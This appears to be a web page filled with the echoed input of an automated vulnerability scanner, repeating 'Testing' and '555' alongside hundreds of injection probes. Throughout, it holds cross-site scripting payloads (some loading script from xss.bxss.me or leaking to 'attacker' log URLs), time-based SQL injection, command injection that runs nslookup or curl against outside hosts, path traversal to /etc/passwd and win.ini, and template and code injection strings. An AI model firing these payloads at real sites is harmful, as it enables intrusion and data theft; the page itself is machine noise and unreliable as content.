%54%65%73%74%69%6E%67%3C%53%63%52%69%50%74%20%3E%52%73%52%34%289830%29%3C%2F%73%43%72%69%70%54%3E

555


...
Testing

555}body{zzz:Expre/**/SSion(quKk(9832))}


...
Testing\u003CScRiPt\RsR4(9093)\u003C/sCripT\u003E

555


...
Testing

5558g62u <ScRiPt >quKk(9500)</ScRiPt>


...
Testing&lt;ScRiPt&gt;RsR4(9014)&lt;/sCripT&gt;

555


...
Testing

555<WJK8HH>RUIBD[!+!]</WJK8HH>


...
Testing<input autofocus onfocus=RsR4(9878)>

555


...
Testing

555<ifRAme sRc=9608.com></IfRamE>


...
<a HrEF=http://xss.bxss.me></a>

555


...
Testing

555<aB3yO69 x=9618>


...
<a HrEF=jaVaScRiPT:>

555


...
Testing

5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z


...
Testing

555<img sRc='http://attacker-9094/log.php?


...
Testing}body{zzz:Expre/**/SSion(RsR4(9564))}

555


...
Testing

555<auYsYp3<


...
TestingKDC0r <ScRiPt >RsR4(9066)</ScRiPt>

555


...
Testing

555


...
Testing<WXI0UL>NFMKA[!+!]</WXI0UL>

555


...
Testing

555


...
Testing<ifRAme sRc=9935.com></IfRamE>

555


...
Testing

555


...
Testing'"()&%<zzz><ScRiPt >quKk(9590)</ScRiPt>

555


...
Testing<aufrDoA x=9910>

555


...
Testing<img sRc='http://attacker-9665/log.php?

555


...
'"()&%<zzz><ScRiPt >quKk(9737)</ScRiPt>

555


...
Testing<aFUTnqV<

555


...
Testing9215238

555


...
Testing

555


...
bfg10921<s1﹥s2ʺs3ʹhjl10921

555


...
Testing

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


...
Testing

555


...
<%={{={@{#{${dfb}}%>

555


...
Testing

555


...
<th:t="${dfb}#foreach

555


...
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555


...
dfb{{98991*97996}}xca

555


...
dfb[[${98991*97996}]]xca

555


...
dfb__${98991*97996}__::.x

555


...
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555


...
Testing<ScRiPt >quKk(9111)</ScRiPt>

555


...
Testing

555


...
Testing

555-1; waitfor delay '0:0:15' --


...
Testing<WW5TLX>9S8XD[!+!]</WW5TLX>

555


...
Testing<script>quKk(9266)</script>

555


...
Testing<script>quKk(9624)</script>9624

555


...
Testing<ScR<ScRiPt>IpT>quKk(9509)</sCr<ScRiPt>IpT>

555


...
Testing<ScRiPt >quKk(9911)</ScRiPt>

555


...
Testing<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9784></ScRiPt>

555


...
Testing<ScRiPt >quKk(9468)</ScRiPt>

555


...
Testing<isindex type=image src=1 onerror=quKk(9609)>

555


...
Testing

555-1); waitfor delay '0:0:15' --


...
Testing<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9211'>

555


...
Testing<body onload=quKk(9159)>

555


...
Testing

555'"()&%<zzz><ScRiPt >sAml(9858)</ScRiPt>


...
Testing

555


...
Testing'"()&%<zzz><ScRiPt >bZA7(9547)</ScRiPt>

555


...
Testing<img src=//xss.bxss.me/t/dot.gif onload=quKk(9488)>

555


...
Testing

555


...
Testing

response.write(9589456*9154733)


...
Testing

echo ievkrr$()\ sdsocx\nz^xyu||a #' &echo ievkrr$()\ sdsocx\nz^xyu||a #|" &echo ievkrr$()\ sdsocx\nz^xyu||a #


...
Testing

'"()&%<zzz><ScRiPt >sAml(9437)</ScRiPt>


...
Testing

'+response.write(9589456*9154733)+'


...
Testing

555


...
Testing

&echo gagzov$()\ qbntxl\nz^xyu||a #' &echo gagzov$()\ qbntxl\nz^xyu||a #|" &echo gagzov$()\ qbntxl\nz^xyu||a #


...
Testing

"+response.write(9589456*9154733)+"


...
'"()&%<zzz><ScRiPt >bZA7(9984)</ScRiPt>

555


...
Testing<img src=xyz OnErRor=quKk(9345)>

555


...
Testing

555&echo mvmvfx$()\ rsgweh\nz^xyu||a #' &echo mvmvfx$()\ rsgweh\nz^xyu||a #|" &echo mvmvfx$()\ rsgweh\nz^xyu||a #


...
Testing

555


...
Testing

|echo szozuf$()\ ggmxju\nz^xyu||a #' |echo szozuf$()\ ggmxju\nz^xyu||a #|" |echo szozuf$()\ ggmxju\nz^xyu||a #


...
Testing

555


...
Testing

555


...
Testing

555|echo kfktij$()\ diizww\nz^xyu||a #' |echo kfktij$()\ diizww\nz^xyu||a #|" |echo kfktij$()\ diizww\nz^xyu||a #


...
Testing

555


...
Testing

5559312510


...
Testing

555


...
Testing<img/src=">" onerror=alert(9998)>

555


...
Testing

(nslookup -q=cname hitlokkdnzknc76b32.bxss.me||curl hitlokkdnzknc76b32.bxss.me))


...
response.write(9603904*9067134)

555


...
Testing9016773

555


...
Testing

$(nslookup -q=cname hitjzhsjhatsbf915c.bxss.me||curl hitjzhsjhatsbf915c.bxss.me)


...
'+response.write(9603904*9067134)+'

555


...
Testing

555


...
Testing

&nslookup -q=cname hitnqhgcxyuole387a.bxss.me&'\"`0&nslookup -q=cname hitnqhgcxyuole387a.bxss.me&`'


...
%54%65%73%74%69%6E%67%3C%53%63%52%69%50%74%20%3E%71%75%4B%6B%289021%29%3C%2F%73%43%72%69%70%54%3E

555


...
"+response.write(9603904*9067134)+"

555


...
Testing

dw18lKyl


...
Testing

&(nslookup -q=cname hitbvsoeieagc669a1.bxss.me||curl hitbvsoeieagc669a1.bxss.me)&'\"`0&(nslookup -q=cname hitbvsoeieagc669a1.bxss.me||curl hitbvsoeieagc669a1.bxss.me)&`'


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

|(nslookup -q=cname hitjrkclksjva3c767.bxss.me||curl hitjrkclksjva3c767.bxss.me)


...
Testing

555


...
Testing

../../../../../../../../../../../../../../etc/passwd


...
Testing\u003CScRiPt\quKk(9221)\u003C/sCripT\u003E

555


...
mcPDtvT4

555


...
Testing

`(nslookup -q=cname hitkwhpkkdzlw91a49.bxss.me||curl hitkwhpkkdzlw91a49.bxss.me)`


...
Testing

555


...
Testing

../../../../../../../../../../../../../../windows/win.ini


...
Testing

555


...
Testing

;(nslookup -q=cname hittslfmeyoox0ec1d.bxss.me||curl hittslfmeyoox0ec1d.bxss.me)|(nslookup -q=cname hittslfmeyoox0ec1d.bxss.me||curl hittslfmeyoox0ec1d.bxss.me)&(nslookup -q=cname hittslfmeyoox0ec1d.bxss.me||curl hittslfmeyoox0ec1d.bxss.me)


...
Testing


...
Testing

file:///etc/passwd


...
Testing

555<esi:include src="http://bxss.me/rpb.png"/>


...
Testing

555


...
Testing

555


...
Testing&lt;ScRiPt&gt;quKk(9788)&lt;/sCripT&gt;

555


...
Testing

555-1 waitfor delay '0:0:15' --


...
Testing

555


...
Testing

555


...
Testing

../555


...
Testing<esi:include src="http://bxss.me/rpb.png"/>

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

${9999021+10000188}


...
Testing

555


...
Testing

555


...
Testing<input autofocus onfocus=quKk(9344)>

555


...
Testing

555


...
Testing

555


...
Testing

555


...
${10000225+10000458}

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
../../../../../../../../../../../../../../etc/passwd

555


...
<a HrEF=http://xss.bxss.me></a>

555


...
Testing

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg


...
Testing

555


...
../../../../../../../../../../../../../../windows/win.ini

555


...
Testing

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg


...
Testing

555


...
file:///etc/passwd

555


...
Testing

555


...
Testing

Http://bxss.me/t/fit.txt


...
<a HrEF=jaVaScRiPT:>

555


...
Testing

555


...
Testing

555


...
Testing

http://bxss.me/t/fit.txt?.jpg


...
Testing

555


...
../Testing

555


...
Testing

/etc/shells


...
Testing

555


...
echo hzattd$()\ cuzsoy\nz^xyu||a #' &echo hzattd$()\ cuzsoy\nz^xyu||a #|" &echo hzattd$()\ cuzsoy\nz^xyu||a #

555


...
Testing

555


...
Testing

c:/windows/win.ini


...
Testing}body{zzz:Expre/**/SSion(quKk(9544))}

555


...
&echo pmabat$()\ iasorz\nz^xyu||a #' &echo pmabat$()\ iasorz\nz^xyu||a #|" &echo pmabat$()\ iasorz\nz^xyu||a #

555


...
Testing

555


...
Testing

bxss.me


...
Testing&echo rnmrew$()\ rfmttq\nz^xyu||a #' &echo rnmrew$()\ rfmttq\nz^xyu||a #|" &echo rnmrew$()\ rfmttq\nz^xyu||a #

555


...
Testing

555


...
Testing

555


...
|echo wusnyv$()\ qlyrzu\nz^xyu||a #' |echo wusnyv$()\ qlyrzu\nz^xyu||a #|" |echo wusnyv$()\ qlyrzu\nz^xyu||a #

555


...
Testing

555


...
TestingLjbur <ScRiPt >quKk(9500)</ScRiPt>

555


...
Testing

555


...
Testing

555&n963677=v941063


...
Testing|echo ptoekd$()\ ihtoik\nz^xyu||a #' |echo ptoekd$()\ ihtoik\nz^xyu||a #|" |echo ptoekd$()\ ihtoik\nz^xyu||a #

555


...
Testing

555


...
Testing

555


...
(nslookup -q=cname hitlqeuucgzkb637c8.bxss.me||curl hitlqeuucgzkb637c8.bxss.me))

555


...
Testing

)


...
Testing

555


...
$(nslookup -q=cname hitzrhhtsrllp03a41.bxss.me||curl hitzrhhtsrllp03a41.bxss.me)

555


...
Testing

!(()&&!|*|*|


...
Testing<WPDRTC>J6EVO[!+!]</WPDRTC>

555


...
Testing

555


...
Testing

555


...
&nslookup -q=cname hithbbmiqjjpld5bab.bxss.me&'\"`0&nslookup -q=cname hithbbmiqjjpld5bab.bxss.me&`'

555


...
Testing

^(#$!@#$)(()))******


...
Testing

555


...
&(nslookup -q=cname hitfsazhaktbhb26b7.bxss.me||curl hitfsazhaktbhb26b7.bxss.me)&'\"`0&(nslookup -q=cname hitfsazhaktbhb26b7.bxss.me||curl hitfsazhaktbhb26b7.bxss.me)&`'

555


...
Testing

555


...
Testing

555


...
|(nslookup -q=cname hitqlcfmaqtep88cff.bxss.me||curl hitqlcfmaqtep88cff.bxss.me)

555


...
Testing

555


...
Testing<ifRAme sRc=9073.com></IfRamE>

555


...
Testing&n939855=v985874

555


...
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

555


...
`(nslookup -q=cname hitpzbnzhatnca1dd5.bxss.me||curl hitpzbnzhatnca1dd5.bxss.me)`

555


...
Testing

555


...
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

555


...
;(nslookup -q=cname hitftvcyfwbqcf4942.bxss.me||curl hitftvcyfwbqcf4942.bxss.me)|(nslookup -q=cname hitftvcyfwbqcf4942.bxss.me||curl hitftvcyfwbqcf4942.bxss.me)&(nslookup -q=cname hitftvcyfwbqcf4942.bxss.me||curl hitftvcyfwbqcf4942.bxss.me)

555


...
)

555


...
Testing

55592TPh7UL'; waitfor delay '0:0:15' --


...
Http://bxss.me/t/fit.txt

555


...
Testing<ajdvqb6 x=9245>

555


...
Testing

555


...
!(()&&!|*|*|

555


...
Testing

555


...
http://bxss.me/t/fit.txt?.jpg

555


...
Testing

555


...
^(#$!@#$)(()))******

555


...
Testing

555


...
/etc/shells

555


...
Testing

555


...
Testing

555


...
Testing<img sRc='http://attacker-9508/log.php?

555


...
c:/windows/win.ini

555


...
Testing

555


...
Testing

555


...
bxss.me

555


...
Testing

'.gethostbyname(lc('hithy'.'ougrnmvs45ab7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(85).chr(113).chr(70).'


...
Testing

555


...
Testing

555


...
Testing

'"()


...
Testing

555


...
Testing

".gethostbyname(lc("hitfb"."robkzdzof2b1d.bxss.me."))."A".chr(67).chr(hex("58")).chr(119).chr(89).chr(100).chr(85)."


...
Testing

555


...
Testing

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


...
Testing

555'&&sleep(27*1000)*ezuagu&&'


...
Testing<abmzt1F<

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

';print(md5(31337));$a='


...
Testing

555"&&sleep(27*1000)*cetpkt&&"


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

";print(md5(31337));$a="


...
Testing

555'||sleep(27*1000)*rgyqso||'


...
Testing

555


...
'.gethostbyname(lc('hitgy'.'gxwgyngte9fb3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(86).chr(114).chr(90).'

555


...
Testing

555


...
Testing

${@print(md5(31337))}


...
Testing

555"||sleep(27*1000)*cnskud||"


...
Testing

555


...
Testing

555


...
".gethostbyname(lc("hituk"."mmcawwot0e31e.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(90).chr(106).chr(74)."

555


...
Testing

555


...
Testing

${@print(md5(31337))}\


...
Testing

555RKLmIXG7


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

'.print(md5(31337)).'


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

HttP://bxss.me/t/xss.html?%00


...
Testing

"+"A".concat(70-3).concat(22*4).concat(119).concat(76).concat(99).concat(89)+(require"socket" Socket.gethostbyname("hitip"+"wvyrnmird93dd.bxss.me.")[3].to_s)+"


...
Testing

1


...
Testing

555


...
Testing

bxss.me/t/xss.html?%00


...
Testing

'+'A'.concat(70-3).concat(22*4).concat(116).concat(77).concat(106).concat(86)+(require'socket' Socket.gethostbyname('hitpp'+'zmqjogsv2d61d.bxss.me.')[3].to_s)+'


...
Testing

1


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

1/.


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
HttP://bxss.me/t/xss.html?%00

555


...
"+"A".concat(70-3).concat(22*4).concat(98).concat(87).concat(112).concat(86)+(require"socket" Socket.gethostbyname("hitsp"+"obdnvkmi1ecae.bxss.me.")[3].to_s)+"

555


...
Testing

555


...
Testing

555


...
Testing

555


...
bxss.me/t/xss.html?%00

555


...
'+'A'.concat(70-3).concat(22*4).concat(119).concat(73).concat(121).concat(90)+(require'socket' Socket.gethostbyname('hitit'+'rzowjrea3d5ec.bxss.me.')[3].to_s)+'

555


...
Testing

555


...
Testing

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


...
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555


...
Testing

555


...
Testing

555


...
Testing

555


...
1

555


...
Testing

555


...
';print(md5(31337));$a='

555


...
Testing

555


...
Testing

555


...
Testing

555


...
1

555


...
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555


...
";print(md5(31337));$a="

555


...
Testing

xfs.bxss.me


...
Testing

'"


...
1/.

555


...
Testing

555


...
${@print(md5(31337))}

555


...
Testing

555'"()&%<zzz><ScRiPt >Ucao(9039)</ScRiPt>


...
Testing

555


...
Testing

<!--


...
Testing

555


...
${@print(md5(31337))}\

555


...
Testing

555


...
xfs.bxss.me

555


...
Testing

555


...
Testing

555


...
'.print(md5(31337)).'

555


...
Testing

555


...
Testing

555-1 OR 887=(SELECT 887 FROM PG_SLEEP(15))--


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

'"()&%<zzz><ScRiPt >Ucao(9268)</ScRiPt>


...
'"

555


...
Testing

555


...
'"()

555


...
<!--

555


...
Testing

555


...
Testing'&&sleep(27*1000)*mqupul&&'

555


...
Testing

555


...
Testing

555


...
Testing

5559709396


...
Testing"&&sleep(27*1000)*kzwqsa&&"

555


...
Testing

555


...
Testing

555


...
Testing'||sleep(27*1000)*vhbhwr||'

555


...
Testing

555


...
Testing

5551Q7uDLxv


...
Testing"||sleep(27*1000)*ynmexa||"

555


...
Testing

bfg9860<s1﹥s2ʺs3ʹhjl9860


...
Testing

555


...
Testing

555


...
Testing

<%={{={@{#{${dfb}}%>


...
Testing

-1 OR 2+305-305-1=0+0+0+1 --


...
Testing

-1 OR 2+353-353-1=0+0+0+1


...
Testing

555


...
Testing

-1' OR 2+427-427-1=0+0+0+1 --


...
Testing

555


...
Testing

<th:t="${dfb}#foreach


...
Testing

-1' OR 2+571-571-1=0+0+0+1 or 'JHIfN9sa'='


...
Testing

555


...
Testing

-1" OR 2+80-80-1=0+0+0+1 --


...
Testing

555


...
Testing

555


...
Testing

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>


...
Testing

dfb{{98991*97996}}xca


...
Testing

555-1) OR 720=(SELECT 720 FROM PG_SLEEP(15))--


...
Testing

dfb[[${98991*97996}]]xca


...
Testing

dfb__${98991*97996}__::.x


...
Testing

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")


...
Testing

555


...
Testing

-1 OR 2+537-537-1=0+0+0+1 --


...
Testing

-1 OR 2+761-761-1=0+0+0+1


...
Testing

555<ScRiPt >Ucao(9952)</ScRiPt>


...
Testing

-1' OR 2+622-622-1=0+0+0+1 --


...
Testing

-1' OR 2+368-368-1=0+0+0+1 or 'piCzEjQf'='


...
Testing

-1" OR 2+841-841-1=0+0+0+1 --


...
Testing

555<W7UF1T>ORD6P[!+!]</W7UF1T>


...
Testing

555<script>Ucao(9687)</script>


...
Testing

555*if(now()=sysdate(),sleep(15),0)


...
Testing

555<script>Ucao(9866)</script>9866


...
Testing

555<ScR<ScRiPt>IpT>Ucao(9779)</sCr<ScRiPt>IpT>


...
Testing

555-1)) OR 139=(SELECT 139 FROM PG_SLEEP(15))--


...
Testing

555<ScRiPt >Ucao(9415)</ScRiPt>


...
Testing

555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9872></ScRiPt>


...
Testing

555<ScRiPt >Ucao(9524)</ScRiPt>


...
Testing

555<isindex type=image src=1 onerror=Ucao(9729)>


...
Testing

555*if(now()=sysdate(),sleep(15),0)


...
Testing

555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9125'>


...
Testing

555<body onload=Ucao(9057)>


...
Testing

5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z


...
Testing

555<img src=//xss.bxss.me/t/dot.gif onload=Ucao(9538)>


...
Testing

555<img src=xyz OnErRor=Ucao(9815)>


...
Testing

55584E6OHNV' OR 741=(SELECT 741 FROM PG_SLEEP(15))--


...
Testing

555<img/src=">" onerror=alert(9057)>


...
Testing

%35%35%35%3C%53%63%52%69%50%74%20%3E%55%63%61%6F%289588%29%3C%2F%73%43%72%69%70%54%3E


...
Testing

555\u003CScRiPt\Ucao(9998)\u003C/sCripT\u003E


...
Testing

555&lt;ScRiPt&gt;Ucao(9099)&lt;/sCripT&gt;


...
Testing

5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z


...
Testing

555<input autofocus onfocus=Ucao(9021)>


...
Testing

<a HrEF=http://xss.bxss.me></a>


...
Testing

5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z


...
Testing

<a HrEF=jaVaScRiPT:>


...
Testing

555}body{zzz:Expre/**/SSion(Ucao(9187))}


...
Testing

555UORcU <ScRiPt >Ucao(9555)</ScRiPt>


...
Testing

5553qcUKmbm') OR 777=(SELECT 777 FROM PG_SLEEP(15))--


...
Testing

555<WEPS7R>XAJKK[!+!]</WEPS7R>


...
Testing

555<ifRAme sRc=9074.com></IfRamE>


...
Testing

555<aWJAQvr x=9806>


...
Testing

555<img sRc='http://attacker-9143/log.php?


...
Testing

5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z


...
Testing

555<atqrYG6<


...
Testing

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

5551ODDeke6')) OR 484=(SELECT 484 FROM PG_SLEEP(15))--


...
Testing'"()&%<zzz><ScRiPt >Ucao(9524)</ScRiPt>

555


...
'"()&%<zzz><ScRiPt >Ucao(9622)</ScRiPt>

555


...
Testing9652671

555


...
bfg2472<s1﹥s2ʺs3ʹhjl2472

555


...
Testing

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


...
<%={{={@{#{${dfb}}%>

555


...
Testing

555-1; waitfor delay '0:0:15' --


...
<th:t="${dfb}#foreach

555


...
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

555


...
dfb{{98991*97996}}xca

555


...
Testing

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


...
dfb[[${98991*97996}]]xca

555


...
dfb__${98991*97996}__::.x

555


...
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

555


...
Testing<ScRiPt >Ucao(9972)</ScRiPt>

555


...
Testing

555-1; waitfor delay '0:0:15' --


...
Testing<W09OED>NUJRX[!+!]</W09OED>

555


...
Testing

555-1); waitfor delay '0:0:15' --


...
Testing<script>Ucao(9036)</script>

555


...
Testing<script>Ucao(9686)</script>9686

555


...
Testing<ScR<ScRiPt>IpT>Ucao(9367)</sCr<ScRiPt>IpT>

555


...
Testing

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


...
Testing

555'"


...
Testing<ScRiPt >Ucao(9870)</ScRiPt>

555


...
Testing

@@Vylgg


...
Testing<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9590></ScRiPt>

555


...
Testing<ScRiPt >Ucao(9247)</ScRiPt>

555


...
Testing<isindex type=image src=1 onerror=Ucao(9224)>

555


...
Testing

555-1); waitfor delay '0:0:15' --


...
Testing<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9062'>

555


...
Testing<body onload=Ucao(9546)>

555


...
Testing

555-1 waitfor delay '0:0:15' --


...
Testing<img src=//xss.bxss.me/t/dot.gif onload=Ucao(9128)>

555


...
Testing<img src=xyz OnErRor=Ucao(9812)>

555


...
Testing<img/src=">" onerror=alert(9370)>

555


...
Testing

555


...
%54%65%73%74%69%6E%67%3C%53%63%52%69%50%74%20%3E%55%63%61%6F%289295%29%3C%2F%73%43%72%69%70%54%3E

555


...
Testing\u003CScRiPt\Ucao(9860)\u003C/sCripT\u003E

555


...
Testing&lt;ScRiPt&gt;Ucao(9870)&lt;/sCripT&gt;

555


...
Testing<input autofocus onfocus=Ucao(9552)>

555


...
Testing

555-1 waitfor delay '0:0:15' --


...
<a HrEF=http://xss.bxss.me></a>

555


...
Testing

555n06VlHQ4'; waitfor delay '0:0:15' --


...
<a HrEF=jaVaScRiPT:>

555


...
Testing}body{zzz:Expre/**/SSion(Ucao(9643))}

555


...
TestingKcFz8 <ScRiPt >Ucao(9167)</ScRiPt>

555


...
Testing

555


...
Testing<WITF11>A6S6L[!+!]</WITF11>

555


...
Testing<ifRAme sRc=9500.com></IfRamE>

555


...
Testing<aGbRcSE x=9639>

555


...
Testing<img sRc='http://attacker-9771/log.php?

555


...
Testing

555vCApcJJh'; waitfor delay '0:0:15' --


...
Testing<a62x3YX<

555


...
Testing

555-1 OR 46=(SELECT 46 FROM PG_SLEEP(15))--


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555-1 OR 904=(SELECT 904 FROM PG_SLEEP(15))--


...
Testing

555-1) OR 763=(SELECT 763 FROM PG_SLEEP(15))--


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555-1) OR 725=(SELECT 725 FROM PG_SLEEP(15))--


...
Testing

555-1)) OR 815=(SELECT 815 FROM PG_SLEEP(15))--


...
Testing

555


...
Testing

555-1)) OR 772=(SELECT 772 FROM PG_SLEEP(15))--


...
Testing

555pcXreaKX' OR 504=(SELECT 504 FROM PG_SLEEP(15))--


...
Testing

555


...
Testing

555zznvFrIJ' OR 417=(SELECT 417 FROM PG_SLEEP(15))--


...
Testing

5558SB0zZgh') OR 395=(SELECT 395 FROM PG_SLEEP(15))--


...
Testing

555


...
Testing

5555sGNZ1PV') OR 550=(SELECT 550 FROM PG_SLEEP(15))--


...
Testing

555NafIDoG8')) OR 806=(SELECT 806 FROM PG_SLEEP(15))--


...
Testing

555


...
Testing

555QqkZyw3Z')) OR 956=(SELECT 956 FROM PG_SLEEP(15))--


...
Testing

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


...
Testing

555


...
Testing

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


...
Testing

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


...
Testing

555'"


...
Testing

@@yw5c6


...
Testing

555


...
Testing

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


...
Testing

555'"


...
Testing

@@yirqs


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing9olH45ZA

555


...
Testing

555


...
Testing

555


...
Testing

555


...
-1 OR 2+459-459-1=0+0+0+1 --

555


...
-1 OR 2+809-809-1=0+0+0+1

555


...
-1' OR 2+525-525-1=0+0+0+1 --

555


...
-1' OR 2+138-138-1=0+0+0+1 or 'gPRGi0is'='

555


...
-1" OR 2+692-692-1=0+0+0+1 --

555


...
Testing

555


...
Testing

555


...
if(now()=sysdate(),sleep(15),0)

555


...
Testing

555


...
Testing

555


...
Testing0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

555


...
Testing

555


...
Testing

555


...
Testing0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

555


...
Testing

555


...
Testing

555


...
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555


...
Testing

555


...
Testing

555


...
Testing-1 waitfor delay '0:0:15' --

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testinga2J0mHMg'; waitfor delay '0:0:15' --

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing

555


...
TestingtYGSGKdt' OR 662=(SELECT 662 FROM PG_SLEEP(15))--

555


...
Testing

555


...
Testing

555


...
TestingCxohabME') OR 250=(SELECT 250 FROM PG_SLEEP(15))--

555


...
Testing

555


...
TestingyApOGiSq

555


...
TestingO14xJiX7')) OR 741=(SELECT 741 FROM PG_SLEEP(15))--

555


...
Testing6gJLr5j6

555


...
Testing

555


...
-1 OR 2+17-17-1=0+0+0+1 --

555


...
-1 OR 2+832-832-1=0+0+0+1

555


...
-1' OR 2+103-103-1=0+0+0+1 --

555


...
-1' OR 2+904-904-1=0+0+0+1 or '3N31DSZ3'='

555


...
-1" OR 2+381-381-1=0+0+0+1 --

555


...
Testing'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

555


...
Testing'"

555


...
Testing

555


...
-1 OR 2+500-500-1=0+0+0+1 --

555


...
@@S2kO6

555


...
-1 OR 2+713-713-1=0+0+0+1

555


...
-1' OR 2+52-52-1=0+0+0+1 --

555


...
if(now()=sysdate(),sleep(15),0)

555


...
-1' OR 2+437-437-1=0+0+0+1 or 'dKQMmWiU'='

555


...
-1" OR 2+26-26-1=0+0+0+1 --

555


...
Testing

555


...
Testing0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

555


...
if(now()=sysdate(),sleep(15),0)

555


...
Testing

555


...
Testing0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

555


...
Testing0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

555


...
Testing

555


...
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555


...
Testing0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

555


...
Testing

555


...
Testing

555


...
Testing

555


...
Testing-1 waitfor delay '0:0:15' --

555


...
Testing

555


...
Testing

555


...
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

555


...
Testing

555


...
TestingrzFRb1FL'; waitfor delay '0:0:15' --

555


...
Testing-1 waitfor delay '0:0:15' --

555


...
Testing

555


...
TestingMjQbIxtU' OR 577=(SELECT 577 FROM PG_SLEEP(15))--

555


...
Testing2SMmsRIc'; waitfor delay '0:0:15' --

555


...
Testing

555


...
TestingCQJoJuPF') OR 904=(SELECT 904 FROM PG_SLEEP(15))--

555


...
TestingPwU3hEIK' OR 549=(SELECT 549 FROM PG_SLEEP(15))--

555


...
Testing

555


...
TestingJ6CHBlaQ')) OR 699=(SELECT 699 FROM PG_SLEEP(15))--

555


...
TestingjmFlu3VU') OR 635=(SELECT 635 FROM PG_SLEEP(15))--

555


...
Testing

555


...
Testing'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

555


...
Testing'"

555


...
@@JDsjX

555


...
TestingkOXByUh3')) OR 171=(SELECT 171 FROM PG_SLEEP(15))--

